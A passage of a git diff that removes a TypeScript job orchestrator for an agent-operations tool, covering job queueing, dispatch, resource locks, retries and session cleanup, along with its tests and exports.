Array.from(jobStore.values()).filter( - (j) => j.environment.repo === repo && statuses.includes(j.status), - ).length; - }, - countJobsActive() { - return Array.from(jobStore.values()).filter((j) => - ["queued", "dispatched", "running"].includes(j.status), - ).length; - }, - - getSession(id: SessionId) { - return sessionStore.get(id as string) ?? null; - }, - updateSession(id: SessionId, updates: Partial) { - const existing = sessionStore.get(id as string); - if (existing) { - sessionStore.set(id as string, { ...existing, ...updates } as Session); - } - }, - getActiveSessions() { - return Array.from(sessionStore.values()).filter( - (s) => s.status === SessionStatus.Active, - ); - }, - getStaleSessions(thresholdIso: string) { - return Array.from(sessionStore.values()).filter( - (s) => s.status === SessionStatus.Active && s.lastHeartbeatAt < thresholdIso, - ); - }, - - insertEvent(event: AgentEvent) { - eventStore.push(event); - }, - - insertLock(lock: ResourceLock) { - lockStore.set(lock.id as string, lock); - }, - updateLock(id: ResourceLock["id"], updates: Partial) { - const existing = lockStore.get(id as string); - if (existing) { - lockStore.set(id as string, { ...existing, ...updates }); - } - }, - getActiveLocks(resource: string) { - return Array.from(lockStore.values()).filter( - (l) => l.resource === resource && !l.released && new Date(l.expiresAt).getTime() > Date.now(), - ); - }, - getActiveLocksForHolder(holderId: string) { - return Array.from(lockStore.values()).filter( - (l) => l.holderId === holderId && !l.released && new Date(l.expiresAt).getTime() > Date.now(), - ); - }, - releaseLocksForHolder(holderId: string) { - let count = 0; - for (const [id, lock] of lockStore) { - if (lock.holderId === holderId && !lock.released) { - lockStore.set(id, { ...lock, released: true }); - count++; - } - } - return count; - }, - releaseExpiredLocks() { - let count = 0; - const now = Date.now(); - for (const [id, lock] of lockStore) { - if (!lock.released && new Date(lock.expiresAt).getTime() <= now) { - lockStore.set(id, { ...lock, released: true }); - count++; - } - } - return count; - }, - - // Expose internals for test assertions - _jobs: jobStore, - _sessions: sessionStore, - _events: eventStore, - _locks: lockStore, - } as OrchestratorDb & { - _jobs: Map; - _sessions: Map; - _events: AgentEvent[]; - _locks: Map; - }; -} - -// ─── Test helpers ─────────────────────────────────────────────────────────── - -const testGoal = { - humanReadable: "Fix auth bug", - structured: { type: "bugfix", description: "Fix auth bypass", parameters: {} }, -}; - -const testEnvironment = { - repo: "myorg/myapp", - branch: "main", - permissions: ["read", "write"] as readonly string[], - sandbox: { enabled: false, isolationLevel: "none" }, -}; - -function addActiveSession(db: ReturnType): Session { - const session = activateSession(createSession("agent-1")); - (db as any)._sessions.set(session.id as string, session); - return session; -} - -// ─── Tests ────────────────────────────────────────────────────────────────── - -describe("Orchestrator", () => { - let db: ReturnType; - let eventBus: EventBus; - let publishedEvents: AgentEvent[]; - - beforeEach(() => { - db = createMockDb(); - eventBus = new EventBus(); - publishedEvents = []; - eventBus.subscribe("*", (e) => publishedEvents.push(e)); - }); - - describe("submitAndQueueJob", () => { - it("creates and persists a job with Queued status", () => { - const job = submitAndQueueJob(db, testGoal, testEnvironment, undefined, eventBus); - - expect(job.status).toBe(JobStatus.Queued); - expect(db.getJob(job.id)).toBeTruthy(); - expect(publishedEvents).toHaveLength(1); - expect(publishedEvents[0]!.type).toBe("job.queued"); - }); - - it("works without eventBus", () => { - const job = submitAndQueueJob(db, testGoal, testEnvironment); - expect(job.status).toBe(JobStatus.Queued); - expect(db.getJob(job.id)).toBeTruthy(); - }); - }); - - describe("dispatchNextJob", () => { - it("dispatches a queued job to an available session", () => { - const job = submitAndQueueJob(db, testGoal, testEnvironment, undefined, eventBus); - const session = addActiveSession(db); - - const result = dispatchNextJob(db, eventBus); - - expect(result.dispatched).toBe(true); - expect(result.job!.status).toBe(JobStatus.Dispatched); - expect(result.session!.id).toBe(session.id); - expect(result.reason).toBe("OK"); - - // Check event was emitted - const dispatchEvents = publishedEvents.filter((e) => e.type === "job.dispatched"); - expect(dispatchEvents).toHaveLength(1); - }); - - it("returns no-dispatch when queue is empty", () => { - const result = dispatchNextJob(db, eventBus); - expect(result.dispatched).toBe(false); - expect(result.reason).toBe("No queued jobs"); - }); - - it("returns no-dispatch when no sessions available", () => { - submitAndQueueJob(db, testGoal, testEnvironment, undefined, eventBus); - - const result = dispatchNextJob(db, eventBus); - expect(result.dispatched).toBe(false); - expect(result.reason).toBe("No available sessions"); - }); - - it("blocks dispatch when lock conflict exists", () => { - submitAndQueueJob(db, testGoal, testEnvironment, undefined, eventBus); - addActiveSession(db); - - // Insert a conflicting lock - const lock: ResourceLock = { - id: createLockId("existing_lock"), - lockType: LockType.Repo, - resource: "myorg/myapp", - holderId: "other-session", - acquiredAt: new Date().toISOString(), - expiresAt: new Date(Date.now() + 60000).toISOString(), - released: false, - }; - (db as any)._locks.set(lock.id as string, lock); - - const result = dispatchNextJob(db, eventBus); - expect(result.dispatched).toBe(false); - expect(result.reason).toContain("Conflict"); - }); - }); - - describe("Full lifecycle: submit -> dispatch -> start -> complete", () => { - it("completes the full job lifecycle", () => { - // Submit - const job = submitAndQueueJob(db, testGoal, testEnvironment, undefined, eventBus); - const session = addActiveSession(db); - - // Dispatch - const dispatchResult = dispatchNextJob(db, eventBus); - expect(dispatchResult.dispatched).toBe(true); - - // Start - const runId = createRunId("run_test_1"); - const startResult = startJobExecution(db, job.id, runId, eventBus); - expect(startResult.success).toBe(true); - expect(startResult.job.status).toBe(JobStatus.Running); - - // Verify session has the run assigned - const sessionAfterStart = db.getSession(session.id); - expect(sessionAfterStart!.currentRunId).toBe(runId); - - // Complete - const completeResult = completeJobExecution(db, job.id, runId, eventBus); - expect(completeResult.success).toBe(true); - expect(completeResult.job.status).toBe(JobStatus.Completed); - - // Verify session run completed - const sessionAfterComplete = db.getSession(session.id); - expect(sessionAfterComplete!.currentRunId).toBeNull(); - expect(sessionAfterComplete!.completedRunIds).toContain(runId); - - // Verify events - const eventTypes = publishedEvents.map((e) => e.type); - expect(eventTypes).toContain("job.queued"); - expect(eventTypes).toContain("job.dispatched"); - expect(eventTypes).toContain("run.started"); - expect(eventTypes).toContain("run.completed"); - expect(eventTypes).toContain("job.completed"); - }); - }); - - describe("failJobExecution", () => { - it("retries a job that has attempts remaining", () => { - const job = submitAndQueueJob(db, testGoal, testEnvironment, { maxAttempts: 3 }, eventBus); - addActiveSession(db); - - // Dispatch and start - dispatchNextJob(db, eventBus); - const runId = createRunId("run_fail_1"); - startJobExecution(db, job.id, runId, eventBus); - - // Fail - const failResult = failJobExecution(db, job.id, "Compilation error", eventBus); - expect(failResult.success).toBe(true); - expect(failResult.job.status).toBe(JobStatus.Queued); - expect(failResult.reason).toContain("Retrying"); - - // Verify the job was re-queued - const updatedJob = db.getJob(job.id); - expect(updatedJob!.status).toBe(JobStatus.Queued); - expect(updatedJob!.attempt).toBe(1); - }); - - it("permanently fails a job that exceeds max attempts", () => { - const job = submitAndQueueJob( - db, - testGoal, - testEnvironment, - { maxAttempts: 1 }, - eventBus, - ); - addActiveSession(db); - - // Dispatch and start - dispatchNextJob(db, eventBus); - const runId = createRunId("run_permfail"); - startJobExecution(db, job.id, runId, eventBus); - - // Update attempt count to maxAttempts to trigger permanent failure - db.updateJob(job.id, { attempt: 1 }); - - const failResult = failJobExecution(db, job.id, "Still broken", eventBus); - expect(failResult.success).toBe(true); - expect(failResult.job.status).toBe(JobStatus.Failed); - expect(failResult.reason).toBe("Permanently failed"); - }); - }); - - describe("terminateSessionGracefully", () => { - it("terminates session and releases locks", () => { - const session = addActiveSession(db); - - // Add a lock held by this session - const lock: ResourceLock = { - id: createLockId("session_lock"), - lockType: LockType.Repo, - resource: "myorg/myapp", - holderId: session.id as string, - acquiredAt: new Date().toISOString(), - expiresAt: new Date(Date.now() + 60000).toISOString(), - released: false, - }; - (db as any)._locks.set(lock.id as string, lock); - - const result = terminateSessionGracefully(db, session.id, "Manual shutdown", eventBus); - - expect(result).toBeTruthy(); - expect(result!.status).toBe(SessionStatus.Terminated); - - // Verify lock was released - const sessionLocks = db.getActiveLocksForHolder(session.id as string); - expect(sessionLocks).toHaveLength(0); - - // Verify event - const termEvents = publishedEvents.filter((e) => e.type === "session.terminated"); - expect(termEvents.length).toBeGreaterThanOrEqual(1); - }); - - it("returns null for non-existent session", () => { - const result = terminateSessionGracefully( - db, - createSessionId("nonexistent"), - "test", - eventBus, - ); - expect(result).toBeNull(); - }); - }); - - describe("cleanupStaleSessions", () => { - it("terminates sessions with old heartbeats", () => { - // Create a session with an old heartbeat - const session = activateSession(createSession("agent-stale")); - const staleSession = { - ...session, - lastHeartbeatAt: new Date(Date.now() - 120000).toISOString(), - } as Session; - (db as any)._sessions.set(staleSession.id as string, staleSession); - - // Create a fresh session that should NOT be cleaned up - const freshSession = addActiveSession(db); - - const terminated = cleanupStaleSessions(db, 60000, eventBus); - - expect(terminated).toHaveLength(1); - expect(terminated[0]!.id).toBe(staleSession.id); - - // Fresh session should still be active - const fresh = db.getSession(freshSession.id); - expect(fresh!.status).toBe(SessionStatus.Active); - }); - }); - - describe("cleanupExpiredLocks", () => { - it("releases expired locks and emits event", () => { - // Add an expired lock - const expiredLock: ResourceLock = { - id: createLockId("expired_lock"), - lockType: LockType.Repo, - resource: "myorg/myapp", - holderId: "old-session", - acquiredAt: new Date(Date.now() - 120000).toISOString(), - expiresAt: new Date(Date.now() - 60000).toISOString(), - released: false, - }; - (db as any)._locks.set(expiredLock.id as string, expiredLock); - - const count = cleanupExpiredLocks(db, eventBus); - expect(count).toBe(1); - }); - - it("does nothing when no expired locks", () => { - const count = cleanupExpiredLocks(db, eventBus); - expect(count).toBe(0); - }); - }); -}); diff --git a/packages/core/src/coordination.ts b/packages/core/src/coordination.ts deleted file mode 100644 index f31944c..0000000 --- a/packages/core/src/coordination.ts +++ /dev/null @@ -1,159 +0,0 @@ -import type { ResourceLock, LockId, JobId } from "./types.js"; -import { LockType, createLockId } from "./types.js"; - -function now(): string { - return new Date().toISOString(); -} - -let counter = 0; -function generateId(): string { - counter++; - return `lock_${Date.now()}_${counter}`; -} - -// ─── Lock lifecycle ────────────────────────────────────────────────────────── - -export function createLock( - lockType: LockType, - resource: string, - holderId: string, - durationMs: number, -): ResourceLock { - const acquired = now(); - const expires = new Date(Date.now() + durationMs).toISOString(); - return { - id: createLockId(generateId()), - lockType, - resource, - holderId, - acquiredAt: acquired, - expiresAt: expires, - released: false, - }; -} - -export function releaseLock(lock: ResourceLock): ResourceLock { - return { - ...lock, - released: true, - }; -} - -export function isLockExpired(lock: ResourceLock): boolean { - return new Date(lock.expiresAt).getTime() < Date.now(); -} - -export function isLockHeld(lock: ResourceLock): boolean { - return !lock.released && !isLockExpired(lock); -} - -// ─── Conflict detection ────────────────────────────────────────────────────── - -export interface ConflictCheckResult { - readonly hasConflict: boolean; - readonly conflictingLocks: ReadonlyArray; - readonly message: string; -} - -export function checkConflicts( - resource: string, - lockType: LockType, - activeLocks: ReadonlyArray, -): ConflictCheckResult { - const conflicting = activeLocks.filter((lock) => { - if (!isLockHeld(lock)) return false; - - if (lockType === LockType.Repo) { - // Repo lock conflicts with any lock on the same repo - return lock.resource === resource || lock.resource.startsWith(resource + "/"); - } - - if (lockType === LockType.Path) { - // Path lock conflicts with repo lock on parent or path lock on same/overlapping path - const lockRes = lock.resource.endsWith("/") ? lock.resource : lock.resource + "/"; - const checkRes = resource.endsWith("/") ? resource : resource + "/"; - return ( - lock.resource === resource || - resource.startsWith(lockRes) || - lock.resource.startsWith(checkRes) - ); - } - - if (lockType === LockType.Branch) { - // Branch lock conflicts with same branch - return lock.resource === resource; - } - - return false; - }); - - if (conflicting.length === 0) { - return { - hasConflict: false, - conflictingLocks: [], - message: `No conflicts for ${lockType} lock on ${resource}`, - }; - } - - const holders = [...new Set(conflicting.map((l) => l.holderId))].join(", "); - return { - hasConflict: true, - conflictingLocks: conflicting, - message: `Conflict: ${resource} is locked by ${holders}`, - }; -} - -// ─── Branch isolation ──────────────────────────────────────────────────────── - -export interface BranchStrategy { - readonly branchName: string; - readonly baseBranch: string; - readonly jobId: string; -} - -export function generateWorkBranch(jobId: JobId, baseBranch: string): BranchStrategy { - const shortId = (jobId as string).slice(0, 12); - return { - branchName: `agentops/${shortId}`, - baseBranch, - jobId: jobId as string, - }; -} - -// ─── Work partitioning ────────────────────────────────────────────────────── - -export interface PathPartition { - readonly jobId: string; - readonly paths: ReadonlyArray; -} - -export interface PartitionStrategy { - readonly partitions: ReadonlyArray; - readonly unassigned: ReadonlyArray; -} - -export function partitionByPath( - paths: ReadonlyArray, - jobIds: ReadonlyArray, -): PartitionStrategy { - if (jobIds.length === 0) { - return { - partitions: [], - unassigned: paths, - }; - } - - const partitions: PathPartition[] = jobIds.map((id) => ({ - jobId: id as string, - paths: [] as string[], - })); - - const unassigned: string[] = []; - - for (let i = 0; i < paths.length; i++) { - const partition = partitions[i % jobIds.length]!; - (partition.paths as string[]).push(paths[i]!); - } - - return { partitions, unassigned }; -} diff --git a/packages/core/src/dispatcher.ts b/packages/core/src/dispatcher.ts deleted file mode 100644 index 338e5a6..0000000 --- a/packages/core/src/dispatcher.ts +++ /dev/null @@ -1,54 +0,0 @@ -import type { Job, Session, ConcurrencyLimits } from "./types.js"; -import { JobPriority, SessionStatus } from "./types.js"; - -export interface DispatchConfig { - concurrencyLimits: ConcurrencyLimits; -} - -export interface DispatchDecision { - canDispatch: boolean; - reason: string; -} - -const PRIORITY_ORDER: Record = { - [JobPriority.Critical]: 4, - [JobPriority.High]: 3, - [JobPriority.Normal]: 2, - [JobPriority.Low]: 1, -}; - -export function evaluateDispatch( - job: Job, - _activeSessions: Session[], - activeJobsByRepo: number, - activeJobsTotal: number, - config: DispatchConfig, -): DispatchDecision { - if (activeJobsTotal >= config.concurrencyLimits.global) { - return { canDispatch: false, reason: "Global concurrency limit reached" }; - } - if (activeJobsByRepo >= config.concurrencyLimits.perRepo) { - return { canDispatch: false, reason: "Per-repo concurrency limit reached" }; - } - return { canDispatch: true, reason: "OK" }; -} - -export function selectNextJob(queue: Job[]): Job | null { - if (queue.length === 0) return null; - const sorted = [...queue].sort((a, b) => { - const pa = PRIORITY_ORDER[a.priority] ?? 0; - const pb = PRIORITY_ORDER[b.priority] ?? 0; - if (pa !== pb) return pb - pa; - return a.queuedAt.localeCompare(b.queuedAt); - }); - return sorted[0]!; -} - -export function matchSession( - _job: Job, - sessions: Session[], -): Session | null { - const active = sessions.filter((s) => s.status === SessionStatus.Active && s.currentRunId === null); - if (active.length === 0) return null; - return active[0]!; -} diff --git a/packages/core/src/events.ts b/packages/core/src/events.ts index 7270693..dc9c7cf 100644 --- a/packages/core/src/events.ts +++ b/packages/core/src/events.ts @@ -4,12 +4,6 @@ import { EventCategory, createEventId } from "./types.js"; // ─── Event type constants ──────────────────────────────────────────────────── export const EVENT_TYPES = { - // Job events - "job.queued": "job.queued", - "job.dispatched": "job.dispatched", - "job.completed": "job.completed", - "job.failed": "job.failed", - // Run events "run.started": "run.started", "run.completed": "run.completed", diff --git a/packages/core/src/index.ts b/packages/core/src/index.ts index c79956d..bead421 100644 --- a/packages/core/src/index.ts +++ b/packages/core/src/index.ts @@ -6,10 +6,8 @@ export type { ActionId, ArtifactId, DecisionId, - JobId, SessionId, EventId, - LockId, Goal, StructuredTask, Agent, @@ -27,34 +25,25 @@ export type { Evaluation, Decision, Run, - ConcurrencyLimits, - RetryPolicy, - Job, ResourceUsage, Session, AgentEvent, - ResourceLock, } from "./types.js"; export { RunStatus, AgentRole, DecisionType, - JobStatus, - JobPriority, SessionStatus, EventCategory, - LockType, createRunId, createPolicyId, createAgentId, createActionId, createArtifactId, createDecisionId, - createJobId, createSessionId, createEventId, - createLockId, } from "./types.js"; // Policy @@ -119,26 +108,6 @@ export { RUN_STALE_THRESHOLD_MS, } from "./run.js"; -// Job builder (WS1) -export { - createJob, - dispatchJob, - startJobRun, - completeJob, - failJob, - cancelJob, - retryJob, -} from "./job.js"; -export type { CreateJobOptions } from "./job.js"; - -// Dispatcher (WS1) -export { - evaluateDispatch, - selectNextJob, - matchSession, -} from "./dispatcher.js"; -export type { DispatchConfig, DispatchDecision } from "./dispatcher.js"; - // Session builder (WS2) export { createSession, @@ -168,38 +137,6 @@ export type { BudgetState, } from "./budget.js"; -// Coordination (WS4) -export type { - ConflictCheckResult, - BranchStrategy, - PathPartition, - PartitionStrategy, -} from "./coordination.js"; - -export { - createLock, - releaseLock, - isLockExpired, - isLockHeld, - checkConflicts, - generateWorkBranch, - partitionByPath, -} from "./coordination.js"; - -// Orchestrator (Sprint 5) -export type { DispatchResult, ExecutionResult, OrchestratorDb } from "./orchestrator.js"; - -export { - submitAndQueueJob, - dispatchNextJob, - startJobExecution, - completeJobExecution, - failJobExecution, - terminateSessionGracefully, - cleanupStaleSessions, - cleanupExpiredLocks, -} from "./orchestrator.js"; - // Agent tree (Sprint 12) export type { AgentNode, AgentCommunication, AgentTimeline } from "./agent-tree.js"; export { buildAgentTimeline } from "./agent-tree.js"; diff --git a/packages/core/src/job.ts b/packages/core/src/job.ts deleted file mode 100644 index 1b90726..0000000 --- a/packages/core/src/job.ts +++ /dev/null @@ -1,115 +0,0 @@ -import type { Job, RunId, SessionId } from "./types.js"; -import { JobStatus, JobPriority, createJobId } from "./types.js"; - -function now(): string { - return new Date().toISOString(); -} - -let counter = 0; -function generateId(): string { - counter++; - return `job_${Date.now()}_${counter}`; -} - -export interface CreateJobOptions { - priority?: JobPriority; - maxAttempts?: number; - retryPolicy?: Job["retryPolicy"]; - concurrencyLimits?: Job["concurrencyLimits"]; -} - -export function createJob( - goal: Job["goal"], - environment: Job["environment"], - options?: CreateJobOptions, -): Job { - const timestamp = now(); - return { - id: createJobId(generateId()), - status: JobStatus.Queued, - priority: options?.priority ?? JobPriority.Normal, - goal, - environment, - retryPolicy: options?.retryPolicy ?? { - maxRetries: 3, - backoffMs: 1000, - backoffMultiplier: 2, - }, - concurrencyLimits: options?.concurrencyLimits ?? { - perRepo: 5, - perOrg: 10, - global: 50, - }, - runIds: [], - sessionId: null, - attempt: 0, - maxAttempts: options?.maxAttempts ?? 3, - queuedAt: timestamp, - dispatchedAt: null, - completedAt: null, - createdAt: timestamp, - updatedAt: timestamp, - }; -} - -export function dispatchJob(job: Job, sessionId: SessionId): Job { - return { - ...job, - status: JobStatus.Dispatched, - sessionId, - dispatchedAt: now(), - updatedAt: now(), - }; -} - -export function startJobRun(job: Job, runId: RunId): Job { - return { - ...job, - status: JobStatus.Running, - runIds: [...job.runIds, runId], - updatedAt: now(), - }; -} - -export function completeJob(job: Job): Job { - return { - ...job, - status: JobStatus.Completed, - completedAt: now(), - updatedAt: now(), - }; -} - -export function failJob(job: Job, _reason: string): Job { - return { - ...job, - status: JobStatus.Failed, - updatedAt: now(), - }; -} - -export function cancelJob(job: Job): Job { - return { - ...job, - status: JobStatus.Cancelled, - updatedAt: now(), - }; -} - -export function retryJob(job: Job): Job { - if (job.attempt >= job.maxAttempts) { - return { - ...job, - status: JobStatus.Failed, - updatedAt: now(), - }; - } - return { - ...job, - status: JobStatus.Queued, - attempt: job.attempt + 1, - sessionId: null, - dispatchedAt: null, - updatedAt: now(), - }; -} diff --git a/packages/core/src/orchestrator.ts b/packages/core/src/orchestrator.ts deleted file mode 100644 index c360b34..0000000 --- a/packages/core/src/orchestrator.ts +++ /dev/null @@ -1,418 +0,0 @@ -import type { Job, Session, AgentEvent, ResourceLock, JobId, RunId, SessionId, Goal, Environment } from "./types.js"; -import { JobStatus, SessionStatus, EventCategory, LockType, createRunId } from "./types.js"; -import { createJob, dispatchJob, startJobRun, completeJob, failJob, retryJob } from "./job.js"; -import type { CreateJobOptions } from "./job.js"; -import { assignRun, completeSessionRun, terminateSession } from "./session.js"; -import { createEvent, EventBus } from "./events.js"; -import { createLock, releaseLock, checkConflicts, isLockExpired } from "./coordination.js"; -import { selectNextJob, matchSession, evaluateDispatch } from "./dispatcher.js"; - -// Re-export EventBus for convenience -export { EventBus } from "./events.js"; - -// ─── Result types ─────────────────────────────────────────────────────────── - -export interface DispatchResult { - readonly dispatched: boolean; - readonly job: Job | null; - readonly session: Session | null; - readonly reason: string; -} - -export interface ExecutionResult { - readonly success: boolean; - readonly job: Job; - readonly reason: string; -} - -// ─── DB interface (duck-typed to avoid circular dependency) ───────────────── -// The orchestrator accepts any object that provides the repository functions it -// needs. In practice callers pass the AgentOpsDb from @agentops/db along with -// the repository helpers. We define a narrow interface here so the core -// package does not depend on the db package. - -export interface OrchestratorDb { - insertJob(job: Job): void; - getJob(id: JobId): Job | null; - updateJob(id: JobId, updates: Partial): void; - getQueuedJobs(limit?: number): Job[]; - countJobsByRepo(repo: string, statuses: string[]): number; - countJobsActive(): number; - - getSession(id: SessionId): Session | null; - updateSession(id: SessionId, updates: Partial): void; - getActiveSessions(): Session[]; - getStaleSessions(thresholdIso: string): Session[]; - - insertEvent(event: AgentEvent): void; - - insertLock(lock: ResourceLock): void; - updateLock(id: ResourceLock["id"], updates: Partial): void; - getActiveLocks(resource: string): ResourceLock[]; - getActiveLocksForHolder(holderId: string): ResourceLock[]; - releaseLocksForHolder(holderId: string): number; - releaseExpiredLocks(): number; -} - -// ─── Helpers ──────────────────────────────────────────────────────────────── - -let runCounter = 0; -function generateRunId(): RunId { - runCounter++; - return createRunId(`run_${Date.now()}_${runCounter}`); -} - -function persistAndPublish(db: OrchestratorDb, eventBus: EventBus, event: AgentEvent): void { - db.insertEvent(event); - eventBus.publish(event); -} - -// ─── Orchestrator functions ───────────────────────────────────────────────── - -/** - * Creates a job, persists it, emits job.queued event, returns the job. - */ -export function submitAndQueueJob( - db: OrchestratorDb, - goal: Goal, - environment: Environment, - options?: CreateJobOptions, - eventBus?: EventBus, -): Job { - const job = createJob(goal, environment, options); - db.insertJob(job); - - if (eventBus) { - const event = createEvent(EventCategory.Job, "job.queued", job.id as string, { - jobId: job.id, - priority: job.priority, - repo: job.environment.repo, - }); - persistAndPublish(db, eventBus, event); - } - - return job; -} - -/** - * Pulls next queued job, checks active sessions, checks locks, acquires repo - * lock, dispatches to a session, emits job.dispatched event. - */ -export function dispatchNextJob( - db: OrchestratorDb, - eventBus: EventBus, -): DispatchResult { - // 1. Get queued jobs - const queuedJobs = db.getQueuedJobs(50); - const nextJob = selectNextJob(queuedJobs); - - if (!nextJob) { - return { dispatched: false, job: null, session: null, reason: "No queued jobs" }; - } - - // 2. Check concurrency limits - const activeSessions = db.getActiveSessions(); - const activeJobsByRepo = db.countJobsByRepo(nextJob.environment.repo, ["dispatched", "running"]); - const activeJobsTotal = db.countJobsActive(); - - const decision = evaluateDispatch( - nextJob, - activeSessions, - activeJobsByRepo, - activeJobsTotal, - { concurrencyLimits: nextJob.concurrencyLimits }, - ); - - if (!decision.canDispatch) { - return { dispatched: false, job: nextJob, session: null, reason: decision.reason }; - } - - // 3. Check lock conflicts - const activeLocks = db.getActiveLocks(nextJob.environment.repo); - const conflict = checkConflicts(nextJob.environment.repo, LockType.Repo, activeLocks); - - if (conflict.hasConflict) { - return { dispatched: false, job: nextJob, session: null, reason: conflict.message }; - } - - // 4. Find an available session - const session = matchSession(nextJob, activeSessions); - if (!session) { - return { dispatched: false, job: nextJob, session: null, reason: "No available sessions" }; - } - - // 5. Acquire repo lock - const lock = createLock(LockType.Repo, nextJob.environment.repo, session.id as string, 30 * 60 * 1000); - db.insertLock(lock); - - // 6. Dispatch job to session - const dispatched = dispatchJob(nextJob, session.id); - db.updateJob(dispatched.id, { - status: dispatched.status, - sessionId: dispatched.sessionId, - dispatchedAt: dispatched.dispatchedAt, - updatedAt: dispatched.updatedAt, - }); - - // 7. Emit event - const event = createEvent(EventCategory.Job, "job.dispatched", dispatched.id as string, { - jobId: dispatched.id, - sessionId: session.id, - repo: dispatched.environment.repo, - }); - persistAndPublish(db, eventBus, event); - - return { dispatched: true, job: dispatched, session, reason: "OK" }; -} - -/** - * Transitions job to Running, assigns run to session, emits run.started event. - */ -export function startJobExecution( - db: OrchestratorDb, - jobId: JobId, - runId: RunId, - eventBus: EventBus, -): ExecutionResult { - const job = db.getJob(jobId); - if (!job) { - return { success: false, job: null as unknown as Job, reason: "Job not found" }; - } - - // Transition job to running - const running = startJobRun(job, runId); - db.updateJob(running.id, { - status: running.status, - runIds: running.runIds, - updatedAt: running.updatedAt, - }); - - // Assign run to session - if (job.sessionId) { - const session = db.getSession(job.sessionId); - if (session) { - const assigned = assignRun(session, runId); - db.updateSession(assigned.id, { - currentRunId: assigned.currentRunId, - // Persist the archived prior run too — assignRun moves any existing - // currentRunId into completedRunIds, which is otherwise lost here. - completedRunIds: assigned.completedRunIds, - updatedAt: assigned.updatedAt, - }); - } - } - - // Emit event - const event = createEvent(EventCategory.Run, "run.started", jobId as string, { - jobId, - runId, - sessionId: job.sessionId, - }); - persistAndPublish(db, eventBus, event); - - return { success: true, job: running, reason: "OK" }; -} - -/** - * Completes the job, completes the session run, releases locks, emits - * job.completed + run.completed events. - */ -export function completeJobExecution( - db: OrchestratorDb, - jobId: JobId, - runId: RunId, - eventBus: EventBus, -): ExecutionResult { - const job = db.getJob(jobId); - if (!job) { - return { success: false, job: null as unknown as Job, reason: "Job not found" }; - } - - // Complete the job - const completed = completeJob(job); - db.updateJob(completed.id, { - status: completed.status, - completedAt: completed.completedAt, - updatedAt: completed.updatedAt, - }); - - // Complete session run - if (job.sessionId) { - const session = db.getSession(job.sessionId); - if (session) { - const completedSession = completeSessionRun(session); - db.updateSession(completedSession.id, { - currentRunId: completedSession.currentRunId, - completedRunIds: completedSession.completedRunIds, - updatedAt: completedSession.updatedAt, - }); - } - - // Release locks held by session - db.releaseLocksForHolder(job.sessionId as string); - } - - // Emit run.completed - const runEvent = createEvent(EventCategory.Run, "run.completed", jobId as string, { - jobId, - runId, - }); - persistAndPublish(db, eventBus, runEvent); - - // Emit job.completed - const jobEvent = createEvent(EventCategory.Job, "job.completed", jobId as string, { - jobId, - repo: completed.environment.repo, - }); - persistAndPublish(db, eventBus, jobEvent); - - return { success: true, job: completed, reason: "OK" }; -} - -/** - * Fails the job, checks retry policy, either retries (re-queues) or - * permanently fails, releases locks, emits job.failed event. - */ -export function failJobExecution( - db: OrchestratorDb, - jobId: JobId, - reason: string, - eventBus: EventBus, -): ExecutionResult { - const job = db.getJob(jobId); - if (!job) { - return { success: false, job: null as unknown as Job, reason: "Job not found" }; - } - - // Release locks held by session - if (job.sessionId) { - db.releaseLocksForHolder(job.sessionId as string); - - // Complete session run so it becomes available - const session = db.getSession(job.sessionId); - if (session) { - const completedSession = completeSessionRun(session); - db.updateSession(completedSession.id, { - currentRunId: completedSession.currentRunId, - completedRunIds: completedSession.completedRunIds, - updatedAt: completedSession.updatedAt, - }); - } - } - - // Check retry policy - const retried = retryJob(job); - - if (retried.status === JobStatus.Queued) { - // Retry: re-queue - db.updateJob(retried.id, { - status: retried.status, - attempt: retried.attempt, - sessionId: retried.sessionId, - dispatchedAt: retried.dispatchedAt, - updatedAt: retried.updatedAt, - }); - - const event = createEvent(EventCategory.Job, "job.failed", jobId as string, { - jobId, - reason, - retrying: true, - attempt: retried.attempt, - }); - persistAndPublish(db, eventBus, event); - - return { success: true, job: retried, reason: `Retrying (attempt ${retried.attempt})` }; - } - - // Permanent failure - const failed = failJob(job, reason); - db.updateJob(failed.id, { - status: failed.status, - updatedAt: failed.updatedAt, - }); - - const event = createEvent(EventCategory.Job, "job.failed", jobId as string, { - jobId, - reason, - retrying: false, - permanent: true, - }); - persistAndPublish(db, eventBus, event); - - return { success: true, job: failed, reason: "Permanently failed" }; -} - -/** - * Terminates session, releases all locks held by session, emits - * session.terminated event. - */ -export function terminateSessionGracefully( - db: OrchestratorDb, - sessionId: SessionId, - reason: string, - eventBus: EventBus, -): Session | null { - const session = db.getSession(sessionId); - if (!session) return null; - - const terminated = terminateSession(session); - db.updateSession(terminated.id, { - status: terminated.status, - terminatedAt: terminated.terminatedAt, - updatedAt: terminated.updatedAt, - }); - - // Release all locks held by this session - db.releaseLocksForHolder(sessionId as string); - - // Emit event - const event = createEvent(EventCategory.Session, "session.terminated", sessionId as string, { - sessionId, - reason, - }); - persistAndPublish(db, eventBus, event); - - return terminated; -} - -/** - * Finds sessions with old heartbeats, terminates them, releases their locks. - */ -export function cleanupStaleSessions( - db: OrchestratorDb, - thresholdMs: number, - eventBus: EventBus, -): Session[] { - const thresholdIso = new Date(Date.now() - thresholdMs).toISOString(); - const staleSessions = db.getStaleSessions(thresholdIso); - - const terminated: Session[] = []; - for (const session of staleSessions) { - const result = terminateSessionGracefully(db, session.id, "Stale heartbeat", eventBus); - if (result) { - terminated.push(result); - } - } - - return terminated; -} - -/** - * Releases expired locks, emits events for each. - */ -export function cleanupExpiredLocks( - db: OrchestratorDb, - eventBus: EventBus, -): number { - const count = db.releaseExpiredLocks(); - - if (count > 0) { - const event = createEvent(EventCategory.Session, "session.terminated", "system", { - type: "lock.cleanup", - releasedCount: count, - }); - persistAndPublish(db, eventBus, event); - } - - return count; -} diff --git a/packages/core/src/types.ts b/packages/core/src/types.ts index c4de4af..ec99486 100644 --- a/packages/core/src/types.ts +++ b/packages/core/src/types.ts @@ -11,10 +11,8 @@ export type AgentId = Brand; export type ActionId = Brand; export type ArtifactId = Brand; export type DecisionId = Brand; -export type JobId = Brand; export type SessionId = Brand; export type EventId = Brand; -export type LockId = Brand; export function createRunId(value: string): RunId { return value as RunId; @@ -34,18 +32,12 @@ export function createArtifactId(value: string): ArtifactId { export function createDecisionId(value: string): DecisionId { return value as DecisionId; } -export function createJobId(value: string): JobId { - return value as JobId; -} export function createSessionId(value: string): SessionId { return value as SessionId; } export function createEventId(value: string): EventId { return value as EventId; } -export function createLockId(value: string): LockId { - return value as LockId; -} // ─── Enums ─────────────────────────────────────────────────────────────────── @@ -66,22 +58,6 @@ export enum AgentRole { Policy = "policy", } -export enum JobStatus { - Queued = "queued", - Dispatched = 